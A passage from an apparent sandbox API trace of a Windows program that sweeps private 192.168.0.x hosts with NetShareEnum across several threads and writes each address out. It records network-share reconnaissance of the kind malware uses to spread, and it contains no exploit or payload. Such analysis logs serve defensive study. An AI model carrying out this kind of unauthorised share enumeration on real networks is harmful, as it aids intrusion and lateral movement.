lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.444] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.444] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x3c5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3c5fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.448] NetShareEnum (in: servername="\\\\192.168.0.185", level=0x1, bufptr=0x3c5fedc, prefmaxlen=0xffffffff, entriesread=0x3c5fed4, totalentries=0x3c5fed0, resume_handle=0x3c5fecc | out: bufptr=0x3c5fedc, entriesread=0x3c5fed4, totalentries=0x3c5fed0, resume_handle=0x3c5fecc) returned 0x35 [0211.205] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.233", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.205] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.233", cchWideChar=15, lpMultiByteStr=0x1e830cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.233", lpUsedDefaultChar=0x0) returned 15 [0211.205] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3c5fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3c5fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.321] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3c5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.321] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.321] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.322] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3c5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.322] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.322] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.322] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x3c5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3c5fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.328] NetShareEnum (in: servername="\\\\192.168.0.233", level=0x1, bufptr=0x3c5fedc, prefmaxlen=0xffffffff, entriesread=0x3c5fed4, totalentries=0x3c5fed0, resume_handle=0x3c5fecc | out: bufptr=0x3c5fedc, entriesread=0x3c5fed4, totalentries=0x3c5fed0, resume_handle=0x3c5fecc) returned 0x35 [0258.067] SetEvent (hEvent=0x1dc) returned 1 [0258.067] RtlExitUserThread (Status=0x0) Thread: id = 42 os_tid = 0xc38 [0088.420] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.21", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.420] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.21", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.21", lpUsedDefaultChar=0x0) returned 14 [0088.420] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3d9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.421] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.421] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.422] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3d9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.422] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.422] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.422] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x3d9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3d9fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.422] NetShareEnum (in: servername="\\\\192.168.0.21", level=0x1, bufptr=0x3d9fedc, prefmaxlen=0xffffffff, entriesread=0x3d9fed4, totalentries=0x3d9fed0, resume_handle=0x3d9fecc | out: bufptr=0x3d9fedc, entriesread=0x3d9fed4, totalentries=0x3d9fed0, resume_handle=0x3d9fecc) returned 0x35 [0144.158] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.84", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.158] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.84", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.84", lpUsedDefaultChar=0x0) returned 14 [0144.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3d9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.158] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.158] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3d9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.158] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.158] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.158] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x3d9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3d9fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.163] NetShareEnum (in: servername="\\\\192.168.0.84", level=0x1, bufptr=0x3d9fedc, prefmaxlen=0xffffffff, entriesread=0x3d9fed4, totalentries=0x3d9fed0, resume_handle=0x3d9fecc | out: bufptr=0x3d9fedc, entriesread=0x3d9fed4, totalentries=0x3d9fed0, resume_handle=0x3d9fecc) returned 0x35 [0178.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.182", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.182", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.182", lpUsedDefaultChar=0x0) returned 15 [0178.426] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3d9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.426] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.426] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.426] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3d9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.426] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.426] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.426] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x3d9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3d9fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.429] NetShareEnum (in: servername="\\\\192.168.0.182", level=0x1, bufptr=0x3d9fedc, prefmaxlen=0xffffffff, entriesread=0x3d9fed4, totalentries=0x3d9fed0, resume_handle=0x3d9fecc | out: bufptr=0x3d9fedc, entriesread=0x3d9fed4, totalentries=0x3d9fed0, resume_handle=0x3d9fecc) returned 0x35 [0211.198] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.228", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.198] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.228", cchWideChar=15, lpMultiByteStr=0x1e8302c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.228", lpUsedDefaultChar=0x0) returned 15 [0211.198] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3d9fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3d9fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.489] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3d9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.489] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.489] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.489] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3d9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.489] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.489] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.489] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x3d9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3d9fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.490] NetShareEnum (in: servername="\\\\192.168.0.228", level=0x1, bufptr=0x3d9fedc, prefmaxlen=0xffffffff, entriesread=0x3d9fed4, totalentries=0x3d9fed0, resume_handle=0x3d9fecc | out: bufptr=0x3d9fedc, entriesread=0x3d9fed4, totalentries=0x3d9fed0, resume_handle=0x3d9fecc) returned 0x35 [0257.998] SetEvent (hEvent=0x1dc) returned 1 [0257.998] RtlExitUserThread (Status=0x0) Thread: id = 43 os_tid = 0xc3c [0088.426] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.22", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.428] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.22", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.22", lpUsedDefaultChar=0x0) returned 14 [0088.428] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3edec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.428] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.428] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.428] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3edec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.428] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.428] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.429] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x3edfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3edfc54*=0x10, lpOverlapped=0x0) returned 1 [0088.429] NetShareEnum (in: servername="\\\\192.168.0.22", level=0x1, bufptr=0x3edfedc, prefmaxlen=0xffffffff, entriesread=0x3edfed4, totalentries=0x3edfed0, resume_handle=0x3edfecc | out: bufptr=0x3edfedc, entriesread=0x3edfed4, totalentries=0x3edfed0, resume_handle=0x3edfecc) returned 0x35 [0144.131] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.83", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.131] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.83", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.83", lpUsedDefaultChar=0x0) returned 14 [0144.131] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3edec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.131] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.131] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.131] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3edec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.131] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.131] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.131] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x3edfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3edfc54*=0x10, lpOverlapped=0x0) returned 1 [0144.136] NetShareEnum (in: servername="\\\\192.168.0.83", level=0x1, bufptr=0x3edfedc, prefmaxlen=0xffffffff, entriesread=0x3edfed4, totalentries=0x3edfed0, resume_handle=0x3edfecc | out: bufptr=0x3edfedc, entriesread=0x3edfed4, totalentries=0x3edfed0, resume_handle=0x3edfecc) returned 0x35 [0178.416] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.181", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.416] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.181", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.181", lpUsedDefaultChar=0x0) returned 15 [0178.416] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3edec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.416] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.416] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.416] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3edec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.416] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.416] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.416] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x3edfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3edfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.423] NetShareEnum (in: servername="\\\\192.168.0.181", level=0x1, bufptr=0x3edfedc, prefmaxlen=0xffffffff, entriesread=0x3edfed4, totalentries=0x3edfed0, resume_handle=0x3edfecc | out: bufptr=0x3edfedc, entriesread=0x3edfed4, totalentries=0x3edfed0, resume_handle=0x3edfecc) returned 0x35 [0211.193] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.218", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.193] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.218", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.218", lpUsedDefaultChar=0x0) returned 15 [0211.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3edec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.194] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.194] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.194] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x3edec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.194] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.194] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.194] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x77, lpNumberOfBytesWritten=0x3edfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x3edfc54*=0x77, lpOverlapped=0x0) returned 1 [0211.277] NetShareEnum (in: servername="\\\\192.168.0.218", level=0x1, bufptr=0x3edfedc, prefmaxlen=0xffffffff, entriesread=0x3edfed4, totalentries=0x3edfed0, resume_handle=0x3edfecc | out: bufptr=0x3edfedc, entriesread=0x3edfed4, totalentries=0x3edfed0, resume_handle=0x3edfecc) returned 0x35 [0257.934] SetEvent (hEvent=0x1dc) returned 1 [0257.934] RtlExitUserThread (Status=0x0) Thread: id = 44 os_tid = 0xc40 [0088.433] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.23", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.433] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.23", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.23", lpUsedDefaultChar=0x0) returned 14 [0088.433] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 